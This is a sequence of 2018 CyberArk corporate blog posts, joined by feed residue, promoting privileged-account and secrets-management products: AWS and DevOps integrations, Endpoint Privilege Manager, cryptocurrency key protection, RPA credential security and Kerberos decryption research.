Yet, even with all of the cloud-related breaches, such as misconfigurations of S3 buckets, which make private data public, and stolen access keys used for crypto-mining, there is still a lack of awareness within too many enterprises of the shared responsibility model among organizations, their cloud providers, and their security teams.  In CyberArk’s 2018 Threat Landscape report, only 49 percent of respondents had a privileged account security strategy in place for cloud.

Earlier today, AWS announced AWS Secrets Manager at the AWS San Francisco Summit. Now, while it is most likely that AWS Secrets Manager will first get adopted by developers at organizations primarily focused on native AWS environments, it is a significant announcement because it highlights the importance of removing secrets from code and storing them securely to protect the organization’s cloud workloads. This is something for which we have advocated, providing solutions to organizations of all types from AWS native, multi-cloud, hybrid, and on-premises for many years.

Secrets management is important, but it is just one element of the Privileged Account Security Solution. At CyberArk, security is our DNA, that’s what we do. We’re widely recognized for offering the industry’s most comprehensive solution for securing privileged accounts, credentials and secrets across on-premises environments, cloud and hybrid and throughout the DevOps pipeline.

What do we specifically offer for AWS?  We’ve been investing in AWS integrations that provide holistic security solutions for enterprises with hybrid and multi-cloud environments, including:

  • The CyberArk AMIs (Amazon Machine Image) and CFTs (Cloud Formation Template) build a complete CyberArk Privileged Account Security environment in AWS in minutes – with primary and DR vaults, as well as session monitoring. It uses a secure and robust architecture developed with AWS that, for example, takes advantage of secure communications sub-nets and utilizes separate AWS Availability Zones for the primary and DR vaults. The flexible architecture also simplifies deployment across hybrid and multi-cloud environments. For more details, see our whitepaper, Securing Hybrid Cloud Environments and Workloads on AWS.
  • CyberArk Conjur is focused on securing dynamic DevOps environments running on Docker and other container environments. It supports a broad range of environments, including native AWS, multi-cloud and hybrid environments with support for leading DevOps tools and platforms, including Ansible, CloudBees, Docker and Pivotal Cloud Foundry (PCF). Conjur Enterprise integrates with the CyberArk Enterprise Password Vault, enabling policies to be holistically applied across the enterprise. We offer both open source and enterprise versions. If you are a PCF customer, please join us for a webinar detailing how Conjur works with PCF on May 1, 2018.
  • CyberArk’s automated provisioning function for AWS automatically on-boards and secures credentials for newly created EC2 instances in AWS environments, by leveraging CloudWatch and Lambda functions. It was designed to improve the native AWS functionality by simply replacing the generic SSH key assigned in a given AWS Auto Scaling Group with a unique key, thereby meeting a security best practice.

To learn more about how to leverage CyberArk to secure your native AWS, hybrid, multi-cloud and DevOps environments today, visit CyberArk.com/aws.

]]>
When Breaches Hit Home https://www.cyberark.com/blog/breaches-hit-home/ Fri, 30 Mar 2018 13:40:47 +0000 https://www.cyberark.com/?p=23712/

Being curious and wanting to understand everything in the world is a good trait for children and young adults, but when it comes to cyber attacks targeting your business, you might find yourself channeling this behavior asking “why” far too many times. Recently, when the latest cyber attack on U.S. infrastructure was on the nightly news, my son started asking all kinds of questions: Why did this happen? Why did they do this? Why don’t we do something to stop them? Why, why, why Dad? At the age of eight, he is asking some really good questions, some that do not have easy answers. For a business, finding answers for these kinds of questions is not so easy either.

Breaches are far too common

Over the last few years, there have been numerous cyber attacks on various institutions and enterprises. Many of these attacks are by individuals or groups, some by nation states or groups backed by nation states. A brief history of the major attacks and use of credentials as part of attacker tactics, techniques and procedures (TTPs) can certainly paint a bleak picture for future outcomes. With an increasing number of breaches in the news, the word “breach” part of the common vernacular. But you know we’ve reached another level when your children start to ask questions about such nefarious actions. Simply put, it hits home. Fortunately, I find solace coming into work, knowing that CyberArk offers solutions that can have a significant and material impact on protecting critical infrastructure from malicious actors. So rather than dwell on the “why” question, a more pragmatic question is “what can you do about it today?” The guidance from the FBI and DHS is clear, but I am referring to practice. Survey results shared in the CyberArk Threat Landscape 2018 report indicate over 86 percent of end users still run with administrative privileges. This reality has a negative impact on any progress against attackers a company might take otherwise

With this in mind, the latest CyberArk Endpoint Privilege Manager v10.2 has key functionality to stop intruders in their tracks. Let’s review a few key additions and enhancements:

Loosely connected devices

With the v10.2 release of the CyberArk Privileged Account Security Solution, CyberArk brings endpoints that operate on the fringe of the network, and those literally off-network, into the fold by offering support for managing local admin accounts exactly as is done for servers and applications in the datacenter. With this use case, we introduce a new integration point with the CyberArk solution specifically the Enterprise Password Vault to manage these local admin accounts. With support for managing local admins accounts and integrated two-factor authentication (such as SailPoint IdentityIQ with a Duo, RSA or Microsoft MFA), a significant amount of the attack risk, as documented in the recent critical infrastructure attacks, could be mitigated by preventing the takeover of privileged accounts, limiting lateral movement and subsequent use for making changes to critical internal systems without a challenge response.

Credential theft

It is inevitable that an attacker will find a way in, given enough time and resources. Plus, one can’t underestimate the human element.  We are the biggest risk in the cyber equation, after all. Until cyborgs take over the world, humans will do most of the work in critical infrastructure (as is the case in most enterprises). As a result, they will likely be the target of a phishing attack or watering hole attack and subsequently allow the attacker in. When this happens, preparation is key. The latest release of Endpoint Privilege Manager introduces new credential protections that further mitigate attackers by preventing illegitimate access to the Microsoft Active Directory Data Store (NTDS.dit). This new feature prevents attackers from stealing the Kerberos Ticket Granting Ticket (or krbtgt) account, which is a preliminary step to a Golden Ticket attack, and harvesting all the organization’s user hashes to execute pass the hash attacks and pivot off the endpoint. This new protection (coupled with the multitude of ways Endpoint Privilege Manager can defend against credential theft) reduces the chance of an attacker’s lateral movement across a network.

Windows 10 v1803 – Redstone 4 build

The latest release of Endpoint Privilege Manager also brings in support for Window 10 v1803. Significant changes to the UAC controls improves the foundation for how CyberArk can integrate with Windows 10 through Endpoint Privilege Manager. While Windows 10 is not called out in the latest attacks, keeping pace with the latest security and OS releases, along with instituting least privilege and application security controls, are known best practices.

By utilizing the latest release of CyberArk Endpoint Privilege Manager and the new feature functionality, attackers targeting critical infrastructure are going to have a significantly harder time establishing a presence, performing reconnaissance or performing lateral movement.

Do the latest cyber attacks have you asking a lot of questions about your organization’s security? Get the right answers about how to address attackers by getting a demo of Endpoint Privilege Manager today!

]]>
New Integration: Pivotal Cloud Foundry and CyberArk Conjur Enterprise https://www.cyberark.com/blog/new-integration-pivotal-cloud-foundry-cyberark-conjur-enterprise/ Thu, 29 Mar 2018 13:10:49 +0000 https://www.cyberark.com/?p=23699/ Pivotal Cloud Foundry

We’re pleased to announce a new integration between CyberArk Conjur Enterprise and Pivotal Cloud Foundry (PCF). Organizations using Pivotal Cloud Foundry can now leverage Conjur Enterprise to secure, manage and rotate secrets and other credentials used by PCF.

Specifically, the integration between PCF and Conjur Enterprise enables organizations to:

  • Automatically replicate secrets from Conjur Enterprise to PCF
  • Manage and automatically rotate secrets in PCF environments, based on policies established with Conjur Enterprise

Pivotal Cloud Foundry is a leading, comprehensive Platform as a Service (PaaS) offering that includes all the runtime, middleware, operating systems and virtualization capabilities required to run applications. Increasingly popular with development teams, PCF is designed to enable developers to create their applications and then easily deploy them on the compute environment of their choice.

Conjur Enterprise is an enterprise-class secrets management solution designed to meet the needs of high velocity, dynamic DevOps environments and CI/CD (Continuous Delivery, Continuous Integration) pipelines. Conjur Enterprise is security focused and incorporates robust security principals including: machine identity, least privilege, role-based access control, policy as code, as well as segregation of duties for both human and non-human users (e.g., containers, micro-services, scripts and machines).

Key Benefits
Pivotal Cloud Foundry already has some native secrets management capacity built into the platform; however, the integration between PCF and Conjur Enterprise offers several important benefits to enterprises which include:

  1. Providing robust security capabilities for PCF and other native DevOps tools. Instead of relying on the capabilities of native DevOps tools, which typically lack basic security features such as policy-based rotation and audit, organizations can leverage the robust security capabilities of Conjur Enterprise to consistently manage secrets and credentials at scale with an enterprise class secrets management platform.
  2. Eliminating “islands of security” with centralized secrets management. The native capabilities of the individual DevOps tools and platforms not only have varying levels of security capabilities, but they also typically cannot securely share secrets across tools. At best, this creates “islands of security.” Conjur Enterprise and its integration with PCF and other DevOps tools eliminates “islands of security” by centralizing the management of secrets and credentials.

Achieve End-to-End Credential Management Across the Enterprise – From CyberArk Vault to Pivotal Cloud Foundry

Just a few weeks ago, we announced an integration between CyberArk Conjur Enterprise and the CyberArk Enterprise Password Vault, which enables secrets and credentials managed by the CyberArk Vault to be automatically replicated into Conjur Enterprise. This means that organizations using PCF, the CyberArk Enterprise Password Vault and Conjur Enterprise have the ability for true end-to-end, policy-based secrets management across their enterprise.

For example, these integrations are designed to enable a secret or credential managed by the CyberArk Vault to be automatically replicated and managed in the PCF PaaS environment as well as other DevOps tools.  These credentials can be managed consistently across on-premises, hybrid and native cloud environments, as well as DevOps environments.

Getting Started with Conjur Enterprise and Pivotal Cloud Foundry 
The PCF integration is available today as an open beta on the Pivotal Network, with a Beta tile available to simplify the deployment of the Service Broker and the Buildpack.  To learn more, contact sales, visit CyberArk.com/Conjur or register for our upcoming webinars that provide additional details of the capabilities and how to deploy.

  • April 11: Learn what’s new in the CyberArk Privileged Account Security Solution v10.2. We’ll also cover the integration of Conjur Enterprise with the CyberArk Vault.
  • May 1: This On The Front Lines webinar will include a demo and technical tutorial featuring both the Conjur Enterprise integration with PCF and with the CyberArk Vault.

Try Open Source
CyberArk also offers an open source integration between Cloud Foundry (the open source version of Pivotal Cloud Foundry) and Conjur Open Source. For additional information and access to the open source integration, read this blog “Cloud Foundry Integration Available in GitHub.” You can also access test and production versions of Conjur Open Source at Conjur.org.  Join the Conjur Slack to communicate directly with our engineers to ask questions and provide product feedback.

]]>
Six Steps to Secure Cryptographic Keys with CyberArk https://www.cyberark.com/blog/six-steps-secure-cryptographic-keys-cyberark/ Mon, 26 Mar 2018 20:54:26 +0000 https://www.cyberark.com/?p=23649/

Cryptocurrency seems to bring out the best effort from cyber criminals. From nation states to traditional attackers, the rise in crypto-related attacks is staggering. The motivation is obvious: it’s financially driven. Despite the recent drop, cryptocurrency values have skyrocketed over the past couple of years incentivizing attackers to create malicious code and sophisticated hacking tools to harvest cryptocurrency coins. One quick way to a massive payday is achieved by compromising a digital wallet and stealing the wallet’s private key. When attackers get their hands on a digital wallet, they can take full control of the funds.

Retailers have started to accept cryptocurrency right alongside good old fashioned cash and credit. This trend is commercializing decentralized currency and forcing the hand of many big banks to get on board. The leg up criminals have, in many of these attacks, is the anonymity involved in crypto-transactions. As this form of currency gains more credibility, organizations in every industry will need to implement security controls to mitigate risk against crypto-credentials from becoming exposed.

A Quick Review on Digital Wallets

There are two types of digital wallets: hot wallets and cold wallets. Hot wallets are used by individual users and organizations to store smaller amounts of currency, adding the need to be more fluid in nature for quick transfers and exchanges. There are many cryptocurrency services such as Coinbase and Bittrex that manage and store the wallet’s private key and provide users with easy access. In most cases, this type of managed service is password protected.

Conversely, cold wallets, used by organizations and security-savvy individuals, typically hold much larger amounts of digital currency. This type of wallet keeps its associated private key off the internet completely (for obvious reasons) and often stores it on an offline computer. Yet, as demonstrated by some of the recent attacks, if the network becomes compromised, then the keys will follow suit shortly thereafter.

There are solutions available that store private keys on a USB stick-like device that does not allow the extraction of the private key. The device is simply inserted into a computer to prove the user has access to the key (using cryptographic functionality zero trust algorithms). This solution provides sound security on the private keys, however, this is not suitable for larger organizations that need to control who has access to the device and its associated credentials.

Don’t Get Digitally Mugged

Cryptocurrency private keys are not exclusively used by human users. There are many automated processes that perform cryptocurrency transactions as well. Securing private keys for all users (both human and machine) is a foundational first step, quickly followed by authenticating and identifying who has access to the keys, controlling the access and monitoring its usage – and that’s where CyberArk can help.

CyberArk considers cryptocurrency private keys as another type of a privileged credential we can manage and protect. In essence, it’s stored similar to how we store a password with a few slight modifications and specific requirements such as ASCII text and character limitations (1024 characters). A ‘shared credential accountability’ and ‘least privilege’ model will allow organizations to not only understand who has access to keys and wallets, but also place limitations and restrictions around the access to these resources.

When human users access private keys, CyberArk ensures access control for permitted users only and establishes workflows such as dual control approvals. For automated processes, applications and scripts can access keys via APIs, but this is often not enough to be 100% secured. It’s critical to authenticate the application and assure it has not been forged or circumvented by a malicious insider or external attacker. With CyberArk’s application authentication techniques, we can validate to ensure only authorized applications have the ability to access and use the private keys. Furthermore, CyberArk provides auditability and monitoring of private key access both for detection of key misuse as well as forensics.

Here are six key (pun intended) considerations to help secure and protect cryptographic keys:

  1. Store cryptographic keys in a secure digital vault – Move keys into a digital vault with multiple layers of security wrapped around it, enforce multi-factor authentication to all users who have access to the vault.
  2. Introduce role segregation – Control individual access to stored keys, preventing even the most privileged administrators from getting to them unless explicit permissions have been granted.
  3. Enable secure application access – Enable access to stored keys for authorized applications and verify that the applications are legitimate.
  4. Audit and review access key activity – Audit all activity related to key access and implement trigger events to alert the necessary individuals of any key activity.
  5. Enforce workflow approvals – Enforce workflow approvals for anything considered to be highly sensitive and the same goes for accessing the keys.
  6. Monitor cryptocurrency administrator activities – Facilitate connections – similar to an automated secure proxy/jump host – to target systems that are used to perform cryptocurrency administrator activities (e.g. the system hosting the wallet).

 

Figure 1:  A standard architecture of CyberArk Privileged Account Security securing cryptocurrency activity.

Cybercriminals will continue to look at this technology as another opportunity to line their pockets. As the #1 leader in privileged account security, CyberArk will continue to safeguard critical systems from key harvesting and many other types of advanced attacks. Interested in learning more about protecting your organization’s cryptographic keys? Reach out to us today to see a live demo of how this works and stayed tuned for dedicated research to be published from the CyberArk Red Team on crypto mining in the coming weeks!

]]>
Bridging the Gap to Third Party Devices, Applications and Operating Systems https://www.cyberark.com/blog/bridging-gap-third-party-devices-applications-operating-systems/ Thu, 22 Mar 2018 12:00:13 +0000 https://www.cyberark.com/?p=23565/

The overall strength of a privileged account security solution can be measured by a typical set of standard benefits including performance, scalability and ease-of-use. One key characteristic that should not be overlooked is the ability to seamlessly integrate with third-party devices, applications and operating systems. When done correctly, this can provide organizations the ability to manage privileged credentials and secrets without significant development cycles, which can consume valuable resources in the process.

The average large enterprise can have hundreds (if not thousands) of different devices, (e.g. workstations, servers, network devices) all of which have privileged accounts that need to be protected and managed. In many cases, there is no centralized approach to managing privileged accounts for these disparate devices. Moreover, these devices are often added or upgraded on a regular cadence, which in turn, creates a never-ending scramble to protect all of the assets users and applications interact with – assets that reside both within and outside the four walls of the organization. The sooner an organization can get a handle on protecting these assets, the sooner they mitigate the risk against today’s advanced threats.

In the past, CyberArk has provided different methods to enable organizations to create their own integrations. The most commonly used format was a development framework that could create third-party plug-ins using scripts such as PowerShell and Python, .NET applications and web browser recording methodologies. The one caveat to be able to utilize this framework was the requirement of basic developer skills and some level of training in order to successfully create custom plug-ins.

In an effort to simplify the way our customers can integrate with other solutions, CyberArk introduced a new tool that delivers a straightforward and intuitive user experience for creating a credential management plug-in. The tool, the Plugin Generator Utility (PGU), streamlines the workflow in a ‘wizard-like’ process.

The first release of the PGU allows for the recording of a plug-in for network devices and appliances (based on Unix/Linux) as well as support for SSH and Telnet protocols – with plans to provide support for cloud and web applications in the not-too-distant future. The tool can also plug into IoT devices to protect and prevent the network it’s connected to from becoming compromised.

Figure 1:  The Plugin Generator Utility recording the process to verify the account password.

We deliberately designed the tool to be used by anyone – the tool does not require a developer’s experience and skillset. Users only need to understand the process and the set of commands required to perform the verification of a password, change a password and reconcile the accounts (e.g., administrative synchronization). Users can generate plugins for accounts that have the ability to log into devices directly, as well as devices that require a traditional logon account. Leveraging the PGU not only saves a significant amount of development time but also reduces operational overhead and eliminates the need for a professional services engagement.

The engine within the PGU detects different prompts for different operating systems (which are SSH related) and once a plugin is recorded, the tool generates a package that can be easily imported into the CyberArk Privileged Account Security Solution. Customers can now create and develop plugins on the fly. Beta testing determined a reduction in development time from ~90 days to 10 minutes! Download this free tool from the CyberArk Support Vault and start creating your own custom plugins today.

 

 

 

]]>
Distinguishing Authentication vs. Authorization https://www.cyberark.com/blog/distinguishing-authn-and-authz/ Mon, 19 Mar 2018 13:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/distinguishing-authn-and-authz/ Authentication vs. Authorization

For many organizations, understanding how to monitor, manage, secure and audit authorization and access is difficult because the distinction between “authorization” and “authentication” is poorly defined.

The latest updates to the NIST Cybersecurity Framework are an important reminder of how quickly the threat landscape changes. Technology has greatly advanced since the NIST framework was initially released in 2014 — and so have cyber security threats . For example, consider the updates to the Identity & Access Control section of NIST. It was updated to clarify concepts such as authn and authz and to provide guidance on best practices for controlling machine identity and access. This is increasingly important as machine access starts to exceed human user access at an exponential rate. This is a trend largely driven by mass adoption of DevOps and digital transformation (DX) practices.

One of the reasons for the NIST update is that many vendors and systems purportedly solve “authorization and access management,” but in reality, they are actually identity (authentication) management solutions. As companies ramp up digital transformation (DX) efforts and move more data into highly connected or cloud-based systems, the consequences of this misunderstanding increases. The modern organization must provide both authentication and authorization management at scale, with an architecture that is cloud native, programmable, distributed and durable. In order to do so, however, they must first distinguish authn from authz and then address each appropriately.

Understanding the Difference

Authn primarily deals with user identity: who is this person? Is she who she says she is? There are a large number of systems that handle this “checkpoint” level of identity and access management and help to reduce the number of credentials that a user needs to provide, often through single sign-on (or SSO).

Authz answers a different set questions, for example: what should this user or system be granted access to? Authz can manage service-to-service as well as user-to-service permissioning. An authz platform might determine if a user is a developer and then grant her permission to push source code to a Git repository, but prohibit the user from directly changing the software deployed into the production environment.

This is a critical distinction for organizations that have fast-moving infrastructure, such as those that are part of a DevOps initiative or digital transformation where there is a push to move away from on-premises IT and towards a cloud-first future. The engine that drives DevOps is infrastructure-as-code. This enables operations teams to configure machines as code. These machines need access and privilege to do what they were programmed to do, but it is getting more difficult for security teams to keep track of who or what has access.

The move from monolithic on-premises servers to micro-services and containers complicates the authz and authn picture by introducing more privileged access, secrets and users and machines to authorize and authenticate. It is no longer only a question of “who is this person and what does she wants to access.” Now, it is also a question of “what is this machine and what does it want to access.”

In our experience, there are (at least) five use cases for authorization-as-a-service in the authz sense, none of which are handled by authn alone:

  • Implementing role-based access controls (RBAC) for user-to-system and system-to-system permissions management.
  • Keeping critical access keys out of code, off of hard drives and out of code repositories such as GitHub and GitLab.
  • Generating audit reports to demonstrate regulatory compliance around access and authorization.
  • Managing SSH keys and secrets at scale across dynamic systems.
  • Gaining visibility into the total set of cloud systems in use and seeing who has access to them.

Organizations Must Control Machine Access and Understand Authz and Authn

NIST is a largely voluntary compliance framework in the public sector, but it is still widely respected as a cyber security guide.  However, compliance frameworks are a lagging indicator of the cyber security threat landscape because they only address breaches that have occurred multiple times. This means that any organization that does not already have both authentication and authorization solutions with machine and application identity capabilities is a cyber security late adopter and at great risk of a breach.

Is your organization moving fast, embracing DevOps, digital transformation, and/or shifting infrastructure to the public cloud? Conjur open source and Conjur Enterprise have helped a number of organizations implement authorization-as-a-service as part of these initiatives and can help you too.

Editor’s Note:  This article originally appeared July, 2014. It has been updated to reflect recent information.

]]>
Product Integration Facilitates Enterprise Secrets Management https://www.cyberark.com/blog/product-integration-facilitates-enterprise-secrets-management/ Wed, 14 Mar 2018 15:25:43 +0000 https://www.cyberark.com/?p=23351/

We’re pleased to announce the integration of CyberArk Application Access Manager with the CyberArk Enterprise Password Vault. This integration enables organizations to:

  • Automatically replicate secrets from the CyberArk Enterprise Password Vault to CyberArk Application Access Manager
  • Use the CyberArk Enterprise Password Vault to manage and automatically rotate secrets in DevOps environments, based on policies established for the CyberArk Enterprise Password Vault

CyberArk Application Access Manager is a powerful secrets management solution specifically designed for the high velocity and dynamic needs of DevOps environments and CI/CD (Continuous Delivery, Continuous Integration) pipelines in enterprise-class environments. To help ensure the security of DevOps environments, the solution incorporates essential principals including: machine identity, least privilege, role-based access control, as well as segregation of duties for both human and non-human users (e.g., containers, micro-services, scripts and machines).

CyberArk Application Access Manager is also integrated with leading DevOps tools including Ansible, Jenkins, Docker, Chef and Puppet, enabling these tools to access and use secrets and credentials managed by CyberArk Application Access Manager. Secrets and credentials can be consistently managed across DevOps environments regardless of the secrets management capabilities of the native DevOps tools – which can vary significantly and are not always enterprise ready, for example, some are missing rotation and audit capabilities.  Importantly, this solution eliminates “islands of security” created when the individual DevOps tools cannot securely share secrets with each other.

The above capabilities don’t require the CyberArk Privileged Account Security Solution or the CyberArk Enterprise Password Vault integration. The capabilities have been available for some time and are used by enterprises to secure their DevOps environments and CI/CD pipelines. Now, the excitement is that, with this integration, customers with the CyberArk Privileged Account Security Solution can extend the capabilities and policies used by the CyberArk Enterprise Password Vault into their DevOps environments.

Key Benefits of the Integration

The CyberArk Application Access Manager integration with the CyberArk Enterprise Password Vault provides several important benefits:

  1. Organizations get additional value from their investments in the CyberArk Privileged Account Security Solution. For example, CyberArk customers wanting to take advantage of DevOps methodologies can now leverage their technology, policy and other investments in privileged account security solutions to help protect their DevOps environments. With the integration, customers can also use CyberArk Privileged Session Manager for monitoring and isolating sessions in their DevOps environments.
  2. Enterprises can consistently manage secrets and credentials. The integration enables enterprises to get closer to implementing centralized, policy-based enforcement including rotation and monitoring of secrets across mixed development and compute environments. For example, CyberArk offers the only solution that enables enterprises to establish a single control point to consistently manage secrets across on-premises, hybrid, cloud native and DevOps environments.
  3. Simplified deployment for developers, security and operations. As with CyberArk Application Access Manager in a stand-alone environment, developers are able to easily meet security requirements by using APIs and code to secure secrets and access credentials without impacting velocity. Now, with the integration, credentials and secrets can be managed and automatically rotated based on policies established within the CyberArk Privileged Account Security Solution. This helps security teams simplify management of DevOps environments as they can leverage the existing tools and policies they are already familiar with. Security functions can focus on the central management of secrets via the CyberArk Enterprise Password Vault, while developers and DevOps teams can work with the native tools/APIs and “as code” capabilities of Conjur. This enables central policy enforcement for DevOps use cases including rotation and monitoring.

The integration also includes a new Synchronizer for replicating secrets from CyberArk Enterprise Password Vault to CyberArk Application Access Manager. Keeping the secrets updated is designed to provide enterprise-class scalability and availability. The CyberArk Enterprise Password Vault and CyberArk Application Access Manager integration currently supports CyberArk Core Privileged Account Security Solutions V9.5 and higher and is currently available as beta with General Availability planned for the end of March 2018. Contact sales for information and access to the beta solution.

To learn more, contact sales, visit CyberArk.com/Conjur or register for our April 11th webinar to learn what’s new in the CyberArk Privileged Account Security Solution v10.2. We’ll also cover the integration of CyberArk Application Access Manager with the CyberArk Enterprise Password Vault.

]]>
Celebrate Saint Patrick’s Day Early with the Release of CyberArk Privileged Account Security Solution Version 10.2 https://www.cyberark.com/blog/cyberark-announces-pas-v10-2/ Tue, 13 Mar 2018 14:00:10 +0000 https://www.cyberark.com/?p=23106/

What’s the connection between privileged account security and Saint Patrick’s Day? Absolutely nothing, but for any Irish-American like myself this excuse is as good as any to kick start one of the most celebrated cultural holidays of the year (note: despite the lack of a connection, there will still be many Irish Proverbs and sayings used throughout this blog). We here at CyberArk are thrilled to announce the release of CyberArk Privileged Account Security Solution Version 10.2. This release extends the theme of improving risk reduction and simplification for privileged account security one step further, as well as showcasing our ability to continue to strengthen the overall security and protection of privilege on the endpoint and throughout the DevOps pipeline. We recently streamlined the CyberArk solution’s user interface to simplify adoption and usability for our key user personas. We’ve taken the next step to build new processes directly into this interface and include many enterprise-ready features to meet the evolving needs of our customers.

Irish Proverb #1 – There’s No Need to Fear the Wind if Your Haystacks are Tied Down

Fear not! We’ve broadened integrations between our solutions to protect your privileged haystack from external attackers and malicious insiders alike. Our session management and threat analytics solutions have been expanded to now include the automatic suspension of a privileged session as well as a detailed audit of Software-as-a-Service (SaaS) and other (web or client) applications. I could throw in more Irish Proverbs here but I’ll save you that and ask you to watch the following demo video to see automatic risk-based session suspension in action. This new capability allows our customers to pre-define risky activities, automatically suspend the session and enable their security operations team to manually resume it when it’s evident that the activity presents no material threat to the organization.

Furthermore, we’ve extended session management connection components to support the Google Chrome browser and secure connections for a wider range of applications that are tied to that browser specifically. For threat detection, CyberArk can now detect both attackers attempting to take over an account and reset passwords – or – a rogue IT employee who wants to bypass organizational policy and take control over the accounts under management. This is the latest addition to the ever growing list of real-time detection capabilities of malicious attempts to bypass privileged account security controls.

To simplify the onboarding of privileged accounts, our customers now have the ability to create automatic onboarding rules directly within the new user interface to automatically onboard accounts from both ‘Accounts Discovery’ and from the ‘Add Pending Accounts’ REST API, as well as backdoor accounts detected by CyberArk Privileged Threat Analytics. To see how this takes shape, watch the demo video.

In terms of managing privilege, we’ve incorporated a comprehensive health dashboard that provides detail on the overall health of the infrastructure and individual components, with drill down functionality for Vault administrators looking to get into the minutia (e.g. list of installed components, component identifiers, IP addresses, connectivity status, etc.). This feature enables users to identify specific instances of each CyberArk component and provide them with the details they need to get an end-to-end view of system health. Furthermore, we’ve automated Microsoft patching on the CyberArk Digital Vault with strong security throughout the process to make the system more secure during a patch update. This reduces deployment friction and complexity around Microsoft patching and through this automation, we can now make it a part of routine operations for the IT team.

Irish Proverb #2It’s Easy to Halve the Potato Where There’s Love

Okay so there are no potatoes involved here but there’s plenty of love between the CyberArk Privileged Account Security Solution and CyberArk Conjur, our DevOps secrets management solution. By the end of this month, CyberArk’s Enterprise Password Vault (v9.5 and up) will officially be integrated with CyberArk Conjur providing a way to synchronize secrets that are managed in the Vault with Conjur. CyberArk customers who store and manage their credentials in the Vault will benefit from CyberArk Conjur’s capabilities in serving up secrets for applications built on containers leveraging DevOps methodologies. The powerful combination of CyberArk Enterprise Password Vault and Conjur delivers immediate value to the install base and enables central policy enforcement for DevOps use cases such as secrets rotation, monitoring, and auditing that is consistent with enterprise policy. Additional details are available here.

And the love doesn’t end there. For endpoint protection, we now support the ability to manage local privileged credentials on the endpoint that are not directly connected to the corporate network. Through tight integration with the Enterprise Password Vault, this new capability ensures security and operational policies are met for privileged credential protection for workstations – including “loosely connected” endpoints that only connect to the corporate network intermittently. Lastly, we’ve made several enhancements to our industry leading credential theft protection including the ability to block credential attacks in the Microsoft Windows Internet Explorer and Edge browsers and the Windows Credential Manager. Learn more by visiting the CyberArk Endpoint Privilege Manager webpage.

Irish Proverb #3 – A New Broom Sweeps Clean, but an Old One Knows the Corners

When it comes to security, you can’t beat experience and when it comes to experience, no one beats CyberArk. We’ve seen more and done more in privileged account security than any other vendor. The v10.2 release is another example of our dedication to innovation and continual investment in research and development. We’ve also included many specific customer requests of which we’ve prioritized and implemented – you’ve asked and we’ve heard you! These new features and capabilities continue to strengthen our position as the #1 undisputed leader in the privileged account security market.

Interested in learning more about the latest version of CyberArk Privileged Account Security Solution?  Register for our webcast to hear more about some of these exciting new capabilities in greater detail.

]]>
How Robotic Process Automation Can Put You at Risk https://www.cyberark.com/blog/power-potential-robotic-process-automation-security-risks/ Wed, 07 Mar 2018 15:15:39 +0000 https://www.cyberark.com/?p=22994/

Robotic Process Automation (RPA) is a powerful, emerging technology and a hot topic of conversation. Despite the buzz, many people remain fuzzy on understanding the specifics. Does RPA mean that organizations will soon employ armies of futuristic robots to do the work that humans once did (remember the movie I, Robot)?

Not quite. Let’s start with a definition. RPA is “the use of software with artificial intelligence and machine learning capabilities to handle high-volume tasks that previously required a human to perform.” In other words, RPA uses “software robots” to automate much of the manual “hand work” involved in daily business, such as entering data (invoices, POs, etc.) from one application into another. What RPA does NOT focus on is the “head work,” or cognitive automation, required to extract information from unstructured sources.  This is the work—and irreplaceable value—of humans in the organization. RPA is not meant to replace employees, but rather, allow them to leverage their experience and capabilities and focus their efforts on business-critical work. RPA simply fills in the gaps—providing 24×7, cross-geography support for time-consuming, repetitive tasks.

Here’s how a typical task could be automated by a “software robot:”

First, a single manual process is used to create a business process flow. The robots would then record that process. From there, any necessary rules, policies or exceptions to that process are identified and assigned to humans to manage.  The robotic process is put into production and repeated over and over again. Throughout this loop, corrective actions are made to continuously refine the process and maximize operational efficiency, productivity and cost-savings.

RPA and Privilege Connection

So what do IT security professionals need to know about RPA platforms and the connection to privileged credentials? Simply put, it is a new attack vector and organizations need to protect the powerful, privileged accounts within these RPA platforms.

Because RPA software interacts directly with business applications and mimics the way applications use and mirror human credentials and entitlements, this can introduce significant risks when the software robots automate and perform routine business processes across multiple systems.

To minimize these risks, securing robotic credentials is paramount. In order to automate processes within an environment, software robots need “power access” (or privileged access) to carry out their mission—whether it be logging into a system(s) to access data or moving a process from step A to step B. This results in a large amount of credentials being stored in the application. An attacker that gains access to the RPA password storage location and cracks the proverbial “password piñata,” can then take the credentials, and ultimately, take control of the robots. Just like any other compromised commercial off-the-shelf (COTS) application, attackers can leverage these powerful credentials to do their bidding—but with RPA, it’s at an even greater scale. Most organizations employ multiple—sometimes hundreds or even thousands of—software robots, which access multiple systems and perform multiple processes simultaneously. With this in mind, you can appreciate the magnitude of risk to the enterprise.

Locking Down RPA Credentials

CyberArk solves the privileged access security challenge for both human and application users.  Through the C3 Alliance, we’ve partnered with some of the world’s leading RPA players, including Automation Anywhere, BluePrism, WorkFusion and UiPath, to provide a simple, easy-to-deploy and cost effective solution to this growing security challenge. This best-in-breed credential management solution:

  • Implements and manages a unique account for every target system that needs to be accessed by a robot: This eliminates the need to put a powerful credential, such as a domain credential, into the application’s server for the robots to leverage. Additionally, if a system is breached, the breach will only affect that particular system—there will not be a larger, ripple effect across multiple systems.
  • Securely stores and retrieves credentials: Instead of storing credentials within the application, robots can request credentials from CyberArk’s centralized, encrypted vault, as needed, via CyberArk Application Identity Manager, to perform their necessary tasks.

Here’s an illustration of this in action:

Interested in learning more about securing RPA with CyberArk? Watch a recent, on-demand webinar, which outlines what IT security professionals need to know about RPA platforms and the connection to privileged credentials. And for further reading, discover five RPA security best practices for privileged credentials and access, and download the “The CISO View: Protecting Privileged Access in Robotic Process Automation.”

 

]]>
Want to Understand What’s Really Happening on Your Network? Try Kerberos Decryption. https://www.cyberark.com/blog/want-understand-whats-really-happening-network-try-kerberos-decryption/ Tue, 06 Mar 2018 18:06:42 +0000 https://www.cyberark.com/?p=22957/

Using Kerberos decryption, it is possible to bridge the gap between attackers and the defenders by providing a real view into active attacks that leverage Kerberos as a means to conceal malicious activity and lateral movement. In a new research whitepaper, CyberArk Labs unveils the potential risk within hidden parts of Kerberos.

To help you better understand Kerberos traffic and illustrate the details in the paper, we have developed a tool called NetRay hosted on github. After you read the whitepaper, we encourage you to download and run this tool and modify as you see fit.

As part of our On the Front Lines webinar series, we have a session on Tuesday, March 6th where we will discuss highlights of this research. To join this webinar or view the recording later, please go to this registration page.

We look forward to your feedback on this research and tool. We hope you’ll share your experiences as you explore your Kerberos encrypted network traffic. Happy Decrypting!

]]>
